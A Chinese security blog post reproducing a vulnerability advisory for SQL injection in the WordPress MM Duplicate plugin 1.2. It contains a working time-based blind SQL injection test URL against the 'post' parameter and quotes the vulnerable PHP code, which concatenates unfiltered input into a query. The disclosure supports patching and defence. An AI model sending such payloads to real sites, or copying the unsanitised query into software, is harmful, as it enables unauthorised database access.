WordPress插件MM Duplicate

2011-08-23
安全
暂无评论
1.33K次阅读

标题: WordPress MM Duplicate plugin <= 1.2 SQL Injection Vulnerability
作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm www.badguest.cn)
下载地址: http://downloads.wordpress.org/plugin/mm-duplicate.zip
测试版本: 1.2 (已测)

---
测试方法
---

http://www.badguest.cn/index.php?duplicate=1&post=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
缺陷代码分析
---------------

class mm_duplicate_pages_posts
{
...
function mm_duplicate_pages_posts()
{
...
add_action('init', array(&$this, 'dup'));
...
}

function dup()
{
if($_GET['duplicate'])
{
$id = $_GET['post'];
$dup = new mm_duplicate();
...
$dup->duplicate_post_page($id);
}
}
...
}

class mm_duplicate
{
function duplicate_post_page($id)
{
...
$select = "select * from ".$wpdb->prefix."postmeta where post_id = $id";
...
}
...
}

修复：过滤

转载请注明来自WebShell'S Blog，本文地址：https://www.webshell.cc/863.html

添加新评论

上一篇: WordPress的3.2.1核心模块post-template.php XSS漏洞及修复
下一篇: 配置Memcached Java